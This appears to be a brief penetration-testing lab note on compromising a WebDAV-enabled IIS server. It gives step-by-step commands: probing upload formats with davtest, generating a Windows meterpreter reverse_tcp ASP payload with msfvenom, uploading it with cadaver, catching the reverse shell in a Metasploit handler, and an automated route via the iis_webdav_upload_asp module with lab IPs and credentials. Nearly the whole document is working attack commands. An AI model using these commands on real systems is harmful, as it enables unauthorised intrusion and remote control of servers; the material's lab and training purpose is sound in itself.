# msfvenom,metasploit First use the davtest command to check which format of files does the server support ``` davtest -auth username:password -url http://ip address/webdav ``` ## Msfvenom In this case the server supports .asp files also so generate a payload using msfvenom ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=(your ip) LPORT=1234 -f asp > shell.asp ``` * Use `cadaver` to upload the generated `shell.asp` payload to the `/webdav` directory ``` cadaver http://10.4.18.218/webdav ``` ``` put /root/shell.asp ``` Before executing the `shell.asp`, *setup a **listener**/**handler** that will receive the reverse connection from the target and send the stage that provides with a `meterpreter` session when executed*. * Open a new terminal tab and run Metasploit with database support ``` service postgresql start && msfconsole ``` * Setup a [Metasploit handler](https://www.rapid7.com/db/modules/exploit/multi/handler/), using the same payload, LHOST, LPORT provided to `msfvenom` ``` use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 10.10.80.4 set LPORT 1234 run ``` * Open the `http://10.4.18.218/webdav` link in the browser and click on `shell.asp` file * The **Meterpreter** session will be opened

* Use cadaver to delete the `shell.asp` uploaded file ``` cadaver http://10.4.18.218/webdav delete shell.asp ``` ## Metasploit - automatic * Use Metasploit [iis\_webdav\_upload\_asp](https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_upload_asp/) module to get a `meterpreter` session on the target system. ``` service postgresql start && msfconsole ``` ``` search iis upload use exploit/windows/iis/iis_webdav_upload_asp set RHOSTS 10.4.22.96 # Lab reset = IP changed set HttpUsername bob set HttpPassword password_123321 set PATH /webdav/metasploit.asp exploit ``` you will be provided with a meterpreter session